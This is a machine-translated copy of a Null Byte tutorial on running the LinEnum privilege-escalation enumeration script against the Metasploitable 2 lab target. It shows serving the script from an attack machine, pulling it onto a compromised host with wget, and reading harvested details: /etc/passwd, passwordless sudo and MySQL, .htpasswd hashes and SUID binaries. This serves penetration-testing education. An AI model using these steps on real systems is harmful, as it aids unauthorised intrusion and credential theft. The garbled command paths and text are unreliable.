قالب وردپرس درنا توس
Home / Tips and Tricks / Using LinEnum to Identify Potential Escalation Vectors for Permissions «Null Byte :: WonderHowTo

Using LinEnum to Identify Potential Escalation Vectors for Permissions «Null Byte :: WonderHowTo



The art of privilege escalation is a skill that every competent hacker should possess. It's a whole field in itself and it's good to know how to do the techniques manually, but it's often more efficient when a script automates the process. LinEnum is one such script that can be incredibly useful for escalating privileges on Linux systems.

Privilege escalation is the method that exploits certain bugs or errors to gain higher privileges relative to the current user. Typically, you must switch from a user-level shell to a root shell on Unix or to a system shell on Windows.

There are a variety of techniques for the successful escalation of permissions, and it can easily take years for everything to be mastered. On Linux, there are several basic methods that try to extend the permissions, as described in g0tmi1

k's famous blog post. However, many of the commands can be automated, and that's what LinEnum does.

LinEnum is a simple bash script that executes common commands that focus on escalating privileges, saving time, and increasing the overhead of rooting. This is not a perfect solution as there may be false positives or missing information. Therefore, it is always a good idea to manually check the items after running the script.

In this guide, we use Metasploitable 2 as the target and Kali Linux, but you can try it with a similar test configuration that you have already set up. However, this requires that you already have a low-level shell on the target.

Step 1: Prepare the script on your attack computer.

First we create a directory that should be edited just to organize the things. Feel free to name it whatever you want. Then change to this directory.

  ~ # mkdir linenum
~ # cd linenum / 

LinEnum and its script can be found on GitHub. An easy way to get the script is to download the raw content directly from GitHub using wget (see below).

  ~ / linenum # wget https://raw.githubusercontent.com/rebootuser/ LinEnum / master / LinEnum.sh

--2019-05-06 11: 24: 05-- https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
Raw.githubusercontent.com is resolved (raw.githubusercontent.com) ... 151.101.148.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com) | 151.101.148.133 |: 443 ... connected.
HTTP request sent, response expected ... 200 OK
Length: 45639 (45K) [text/plain]
Save as: "LinEnum.sh"

LinEnum.sh 100% [======================================================================================================================>] 44.57 KB / s in 0.05 s

2019-05-06 11:24:05 (872 KB / s) - "LinEnum.sh" saved [45639/45639] 

After the script is in our directory, we can use Python to send the file to our destination deliver. The easiest way is with the module SimpleHTTPServer .

  ~ / linenum # python -m SimpleHTTPServer

Serving HTTP to 0.0.0.0 Port 8000 ... 

This module returns the contents of the directory where you start it on port 8000. We can also specify any other desired port as shown below.

  ~ / Linen # Python -m SimpleHTTPServer 1337

Serving HTTP on 0.0.0.0 port 1337 ... 

Step 2: Download the script to the target computer.

Next, switch to a directory on the target to move the file to. I like to use / var / tmp but any worldwide writable directory is a good choice.

  www-data @ metasploitable: / var / www / dvwa / vulnerabilities / exec $ cd / var / tmp 

Other good candidates are:

  • / tmp
  • / dev / shm
  • / var / lock
  • / run / lock

Now we need a way to transfer the file. Utilities such as wget and curl are usually available on Linux systems and provide an easy way to capture files. Check with the command which which is installed.

  www-data @ metasploitable: / var / tmp $ which wget

/ usr / bin / wget 

Then download LinEnum to the target.

  www-data @ metasploitable: / var / tmp $ wget 10.10.0.1:1337/LinEnum.sh

- 10: 20: 58-- http://10.10.0.1:1337/LinEnum.sh
=> `LinEnum.sh & # 39;
Connection to 10.10.0.1:1337 is made ... manufactured.
HTTP request sent, response expected ... 200 OK
Length: 45,639 (45K) [text/x-sh]

100% [=========================================================================================================================================================================>] 45,639 --.-- K / s

10:20:58 (38.45 MB / s) - "LinEnum.sh" saved [45639/45639] 

When we view the permissions, our script is not yet executable.

  www-data @ metasploitable: / var / tmp $ ls -la

a total of 60
drwxrwxrwt 2 root root 4096 August 8 10:20.
drwxr-xr-x 14 root 4096 17 March 2010 ..
-rw-r - r-- 1 www-data www-data 45639 May 6, 2019 LinEnum.sh 

But we can make it executable with the command chmod .

  www-data @ metasploitable: / var / tmp $ chmod + x LinEnum.sh 

If we now display permissions, they will be displayed as executable.

  www-data @ metasploitable: / var / tmp $ ls -la

a total of 60
drwxrwxrwt 2 root root 4096 August 8 10:20.
drwxr-xr-x 14 root 4096 17 March 2010 ..
-rwxr-xr-x 1 www-data www-data 45639 May 6, 2019 LinEnum.sh 

Step 3: Run LinEnum and Analyze Results

Once everything is set up, all you need to do is run LinEnum.

  www-data @ metasploitable: / var / tmp $ ./LinEnum.sh[19659009<TheScriptsstartedandcanbepervisedforwintersteadyouwhenyoucanwanttostartlookingattheresultsandstartlookingattheresultsstartingwithsomesysteminformationonkernelexploitsandrecoveryfor kernel exploits can be helpful: 

  ############## ############################################
# Local Linux Enumeration & Privilege Escalation Script #
################################################## #######
# www.rebootuser.com
# Version 0.96

[-] Debug info
[+] Thorough Tests = Disabled

Scan started at:
Wed Aug 8 10:23:33 EDT 2018

### SYSTEM ############################################
[-] Kernel Information:
Linux metasploitable 2.6.24-16-server # 1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU / Linux

[-] Kernel Information (continued):
Linux Version 2.6.24-16 Server (buildd @ palmer) (gcc Version 4.2.3 (Ubuntu 4.2.3-2ubuntu7)) # 1 SMP Thu 10.04. 13:58:00 UTC 2008

[-] Specific Publication Information:
DISTRIB_ID = Ubuntu
DISTRIB_RELEASE = 8.04
DISTRIB_CODENAME = hardy
DISTRIB_DESCRIPTION = "Ubuntu 8.04"

[-] Hostname:
metasploitable 

Next, we get some user information, e.g. Previously logged in users and current user information:

  ### USER / GROUP ################### ############# ###########
[-] Information about the current user / group:
uid = 33 (WWW data) gid = 33 (WWW data) groups = 33 (WWW data)

[-] Users who have previously logged on to the system:
Username Port of latest
root pts / 0: 0.0 Wed Aug 8 09:46:22 -0400 2018
msfadmin tty1 Wed Aug 8 09:47:11 -0400 2018

[-] Who is still logged in:
10:23:33 to 38 min, 2 users, load average: 0.01, 0.02, 0.00
USER TTY OF LOGIN @ IDLE JCPU PCPU WHAT
msfadmin tty1 - 09:47 35: 59m 0.19s 0.09s -bash
root pts / 0: 0.0 09:46 37: 14m 0.04s 0.04s -bash 

It also gives us the content of / etc / passwd which may be helpful when listing users on the machine :

  [-] Contents of / etc / passwd:
root: x: 0: 0: root: / root: / bin / bash
Daemon: x: 1: 1: daemon: / usr / sbin: / bin / sh
bin: x: 2: 2: bin: / bin: / bin / sh
sys: x: 3: 3: sys: / dev: / bin / sh
sync: x: 4: 65534: sync: / bin: / bin / sync
Games: x: 5: 60: Games: / usr / Games: / bin / sh
man: x: 6: 12: man: / var / cache / man: / bin / sh
lp: x: 7: 7: lp: / var / spool / lpd: / bin / sh
mail: x: 8: 8: mail: / var / mail: / bin / sh
news: x: 9: 9: news: / var / spool / news: / bin / sh
uucp: x: 10: 10: uucp: / var / spool / uucp: / bin / sh
Proxy: x: 13: 13: Proxy: / bin: / bin / sh
www-data: x: 33: 33: www-data: / var / www: / bin / sh
backup: x: 34: 34: backup: / var / backups: / bin / sh
list: x: 38: 38: mailing list manager: / var / list: / bin / sh
irc: x: 39: 39: ircd: / var / run / ircd: / bin / sh
gnats: x: 41: 41: midges bug reporting system (admin): / var / lib / gnats: / bin / sh
nobody: x: 65534: 65534: nobody: / ​​nonexistent: / bin / sh
libuuid: x: 100: 101 :: / var / lib / libuuid: / bin / sh
dhcp: x: 101: 102 :: / absent: / bin / false
syslog: x: 102: 103 :: / home / syslog: / bin / false
klog: x: 103: 104 :: / home / klog: / bin / false
sshd: x: 104: 65534 :: / var / run / sshd: / usr / sbin / nologin
msfadmin: x: 1000: 1000: msfdmin ,,,: / home / msfadmin: / bin / bash
bind: x: 105: 113 :: / var / cache / bind: / bin / false
postfix: x: 106: 115 :: / var / spool / postfix: / bin / false
ftp: x: 107: 65534 :: / home / ftp: / bin / false
postgres: x: 108: 117: PostgreSQL administrator ,,,: / var / lib / postgresql: / bin / bash
mysql: x: 109: 118: mysql server ,,,: / var / lib / mysql: / bin / false
tomcat55: x: 110: 65534 :: / usr / share / tomcat5.5: / bin / false
distccd: x: 111: 65534 :: /: / bin / false
user: x: 1001: 1001: only one user, 111 ,,: / home / user: / bin / bash
service: x: 1002: 1002: ,,,: / home / service: / bin / bash
telnetd: x: 112: 120 :: / not available: / bin / false
proftpd: x: 113: 65534 :: / var / run / proftpd: / bin / false
statd: x: 114: 65534 :: / var / lib / nfs: / bin / false 

Then we get some information about the superuser account. For example, accounts that have recently used sudo, root directory permissions, and SSH credentials:

  [-] Super User Account (s):
root

[+] We can sudo without a password!
Usage: sudo -h | -K | -k | -L | -l | -V | -v
Use: sudo [-bEHPS] [-p prompt] [-u username|#uid] [VAR=value]
              {- i | -s | }
Usage: sudo -e [-S] [-p prompt] [-u username|#uid]   file ...

[-] Accounts that have recently used sudo:
/home/msfadmin/.sudo_as_admin_successful

[+] We can read root's root directory!
a total of 76K
drwxr-xr-x 13 root root 4.0K Aug 8 09:46.
drwxr-xr-x 21 root root 4.0K January 15, 2019 ..
-rw ------- 1 root root 324 8 Aug 09:46. Authority
lrwxrwxrwx 1 root root May 9, 14 2012 .bash_history -> / dev / null
-rw-r - r-- 1 root root 2.2K Oct 20, 2007 .bashrc
drwx ------ 3 root root 4.0K May 20, 2012 .config
drwx ------ 2 root root 4.0K May 20, 2012 .filezilla
drwxr-xr-x 5 root root 4.0K August 8th 09:46 .fluxbox
drwx ------ 2 root root 4.0K May 20, 2012 .gconf
drwx ------ 2 root root 4.0K May 20, 2012 .gconfd
drwxr-xr-x 2 root root 4.0K May 20, 2012 .gstreamer-0.10
drwx ------ 4 root root 4.0K May 20, 2012 Mozilla
-rw-r - r-- 1 root root 141 October 20, 2007 .profile
drwx ------ 5 root root 4.0K May 20, 2012 .purple
-rwx ------ 1 root root May 4, 2012 .rhosts
drwxr-xr-x 2 root root 4.0K May 20, 2012 .ssh
drwx ------ 2 root root 4.0K Aug 8 09:46 .vnc
drwxr-xr-x 2 root root 4.0K May 20, 2012 Desktop
-rwx ------ 1 root root 401 May 20, 2012 reset_logs.sh
-rw-r - r-- 1 root root 138 Aug 8 09:46 vnc.log

[-] Are permissions to / home directories lax:
a total of 24K
drwxr-xr-x 6 root root 4.0K 16.04.2010.
drwxr-xr-x 21 root root 4.0K January 15, 2019 ..
drwxr-xr-x 2 root nogroup 4.0K 17.03.2010 ftp
drwxr-xr-x 5 msfadmin msfadmin 4.0K June 6 13:03 msfadmin
drwxr-xr-x 2 service service 4.0K 16.04.2010 service
drwxr-xr-x 3 User User 4.0K May 7, 2010 User

[-] Root is allowed to log in via SSH:
PermitRootLogin yes 

Below, we can see all the cron jobs available on the computer, which can be especially useful for escalating privileges because these tasks are often run as root:

  ### JOBS / TASKS ## ########################################
[-] Cron Jobs:
-rw-r - r-- 1 root root 724 April 8, 2008 / etc / crontab

/etc/cron.d:
20 in total
drwxr-xr-x 2 root root 4096 Jul 5th 16:19.
drwxr-xr-x 94 root root 4096 August 8 09:45 ..
-rw-r - r-- 1 root root 102 April 8, 2008 .placeholder
-rw-r - r-- 1 root root 507 May 3, 2012 php5
-rw-r - r-- 1 root root 1323 Mar 31 2008 postgresql-common

/etc/cron.daily:
a total of 60
drwxr-xr-x 2 root root 4096 April 28, 2010.
drwxr-xr-x 94 root root 4096 August 8 09:45 ..
-rw-r - r-- 1 root root 102 April 8, 2008 .placeholder
-rwxr-xr-x 1 root root 633 February 1, 2008 apache2
-rwxr-xr-x 1 root root 7441 April 22, 2008 Apt
-rwxr-xr-x 1 root root 314 April 4, 2008 Suitability
-rwxr-xr -x 1 root root 502 December 12, 2007 bsdmainutils
-rwxr-xr-x 1 root root 89 Jun 19 2006 logrotate
-rwxr-xr-x 1 root root 954 March 12, 2008 man-db
-rwxr-xr-x 1 root root 183 Mar 8 2008 mlocate
-rwxr-xr -x 1 root root 383 April 28, 2010 Samba
-rwxr-xr -x 1 root root 3295 April 8, 2008 Default
-rwxr-xr -x 1 root root 1309 November 23, 2007 sysklogd
-rwxr-xr-x 1 root root 477 December 7, 2008 tomcat55

/etc/cron.hourly:
12 in total
drwxr-xr-x 2 root 4096 March 16, 2010.
drwxr-xr-x 94 root root 4096 August 8 09:45 ..
-rw-r - r-- 1 root root 102 April 8, 2008 .placeholder

/etc/cron.monthly:
20 in total
drwxr-xr-x 2 root root 4096 April 28, 2010.
drwxr-xr-x 94 root root 4096 August 8 09:45 ..
-rw-r - r-- 1 root root 102 April 8, 2008 .placeholder
-rwxr-xr -x 1 root root 664 February 20, 2008 proftpd
-rwxr-xr-x 1 root root 129 April 8, 2008 Default

/etc/cron.weekly:
a total of 24
drwxr-xr-x 2 root 4096 March 16, 2010.
drwxr-xr-x 94 root root 4096 August 8 09:45 ..
-rw-r - r-- 1 root root 102 April 8, 2008 .placeholder
-rwxr-xr-x 1 root root 528 March 12, 2008 man-db
-rwxr-xr -x 1 root root 2522 Jan 28 2008 Popularity contest
-rwxr-xr -x 1 root root 1220 November 23, 2007 sysklogd 

Below is some information about certain software installed on the system. It contains version numbers that can be useful when trying out exploits, and specific information such as MySQL login names and permissions:

  ### SOFTWARE ################### # ##########################
[-] sudo version:
Sudo version 1.6.9p10

[-] MYSQL version:
mysql Ver 14.12 Distrib 5.0.51a for debian-linux-gnu (i486) with readline 5.2

[+] We can call ourselves & # 39; root & # 39; and connect to the local MYSQL service without a password!
mysqladmin Ver 8.41 Distrib 5.0.51a for debian-linux-gnu on i486
Copyright (C) 2000-2006 MySQL AB
This software comes with ABSOLUTELY NO WARRANTY. This is free software,
You can also change and share it under the GPL license

Server version 5.0.51a-3ubuntu5
Protocol version 10
Connection Localhost via UNIX socket
UNIX socket /var/run/mysqld/mysqld.sock
Operating time: 38 min. 1 sec

Threads: 2 Questions: 456 Slow Queries: 0 Open: 420 Flush Tables: 1 Open Tables: 64 Queries per second avg: 0.200 

The script also searches for certain files that could potentially contain passwords, such as: B. . htpasswd File:

  [-] htpasswd found - could contain passwords:
/home/msfadmin/vulnerable/twiki20030201/twiki-source/data/.htpasswd
TWikiGuest: zK.G.uuPi39Qg
PeterThoeny: CQdjUgwC6YckI
NicholasLee: h3i.9AzGUn4tQ
AndreaSterbini: zuUMZlkXvUR6Y
John Talintyre: 2fl31yuNhvMrU
MikeMannix: euHykHV5Q2miA
Richard Donkin: pAVoSPpUf3xt2
GrantBow: EI7XT7IJJV40A
/var/www/twiki/data/.htpasswd
TWikiGuest: zK.G.uuPi39Qg
PeterThoeny: CQdjUgwC6YckI
NicholasLee: h3i.9AzGUn4tQ
AndreaSterbini: zuUMZlkXvUR6Y
John Talintyre: 2fl31yuNhvMrU
MikeMannix: euHykHV5Q2miA
Richard Donkin: pAVoSPpUf3xt2
GrantBow: EI7XT7IJJV40A 

And finally, it shows us potentially interesting SUID binaries, which in my opinion is the most useful feature of this script. These are programs that are allowed to run with the privileges of a specific user, usually a user with higher privileges. If certain programs are set as follows (for example, older versions of nmap), they can be misused to obtain a root shell:

  [-] Can Confidential Files Be Read / Written:
-rw-r - r-- 1 root root 1581 May 13, 2012 / etc / passwd
-rw-r - r-- 1 root root 886 April 16, 2010 / etc / group
-rw-r - r-- 1 root root 497 May 13, 2012 / etc / profile
-rw-r ----- 1 root shadow 1207 May 13, 2012 / etc / shadow

[-] SUID files:
-rwsr-xr -x 1 root root 63584 April 14, 2008 / bin / umount
-rwsr-xr-- 1 Root-Backup 20056 26.02.2008 / bin / fusermount
-rwsr-xr -x 1 root root 25540 2nd April 2008 / bin / su
-rwsr-xr -x 1 root root 81368 April 14, 2008 / bin / mount
-rwsr-xr -x 1 root root 30856 December 10, 2007 / bin / ping
-rwsr-xr -x 1 root root 26684 December 10, 2007 / bin / ping6
-rwsr-xr-x 1 root_root 65520 December 2, 2008 /sbin/mount.nfs
-rwsr-xr-- 1 root dhcp 2960 April 2, 2008 / lib / dhcp3-client / call-dhclient-script
-rwsr-xr-x 2 root root 107776 February 25, 2008 / usr / bin / sudoedit
-rwsr -sr -x 1 root root 7460 June 25, 2008 / usr / bin / X
-rwsr-xr -x 1 root root 8524 November 22, 2007 / usr / bin / netkit-rsh
-rwsr-xr -x 1 root root 37360 April 2nd, 2008 / usr / bin / gpasswd
-rwsr-xr -x 1 root root 12296 December 10, 2007 /usr/bin/traceroute6.iputils
-rwsr-xr-x 2 root root 107776 February 25, 2008 / usr / bin / sudo
-rwsr-xr -x 1 root root 12020 November 22, 2007 / usr / bin / netkit-rlogin
-rwsr-xr -x 1 root root 11048 December 10, 2007 / usr / bin / arping
-rwsr-sr-x 1 Daemon Daemon 38464 February 20, 2007 / usr / bin / at
-rwsr-xr -x 1 root root 19144 April 2, 2008 / usr / bin / newgrp
-rwsr-xr -x 1 root root 28624 April 2, 2008 / usr / bin / chfn
-rwsr-xr -x 1 root root 780676 April 8, 2008 / usr / bin / nmap
-rwsr-xr -x 1 root root 23952 April 2nd, 2008 / usr / bin / chsh
-rwsr-xr -x 1 root root 15952 November 22, 2007 / usr / bin / netkit-rcp
-rwsr-xr -x 1 root_root 29104 April 2, 2008 / usr / bin / passwd
-rwsr-xr -x 1 root root 46084 March 31, 2008 / usr / bin / mtr
-rwsr-sr-x 1 libuuid libuuid 12336 March 27, 2008 / usr / sbin / uuidd
-rwsr-xr-- 1 Stammdip 269256 4. Oktober 2007 / usr / sbin / pppd
-rwsr-xr-- 1 root telnetd 6040 December 17, 2006 / usr / lib / telnetlogin
-rwsr-xr-- 1 root www-data 10276 March 9, 2010 / usr / lib / apache2 / suexec
-rwsr-xr -x 1 root 4524 November 5, 2007 / usr / lib / eject / dmcrypt-get-device
-rwsr-xr -x 1 root root 165748 6 April 2008 / usr / lib / openssh / ssh-keysign
-rwsr-xr -x 1 root root 9624 August 17, 2009 / usr / lib / pt_chown

[+] Possibly interesting SUID files:
-rwsr-xr-- 1 root dhcp 2960 April 2, 2008 / lib / dhcp3-client / call-dhclient-script
-rwsr-xr -x 1 root root 780676 April 8, 2008 / usr / bin / nmap
-rwsr-xr-x 1 root root 46084 31.03.2008 / usr / bin / mtr 

Summary

Today we learned a bit about the escalation of permissions and how scripts like LinEnum can be incredibly useful to certain things to automate. We downloaded the file from GitHub and transferred it to the target, made the script executable and executed, and analyzed the results and some common ways to use the output. With LinEnum, you can easily identify possible escalation vectors for permissions on Linux.

Title image of drd_ / zero byte

Source link